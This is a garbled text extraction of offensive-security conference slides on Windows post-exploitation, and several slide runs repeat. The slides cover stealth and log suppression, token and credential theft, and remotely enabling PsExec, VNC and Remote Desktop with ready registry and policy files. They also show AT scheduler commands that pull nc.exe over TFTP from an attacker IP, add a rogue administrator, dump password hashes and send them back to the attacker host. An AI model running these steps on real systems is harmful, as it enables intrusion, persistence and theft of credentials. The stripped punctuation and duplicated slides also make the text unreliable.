bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
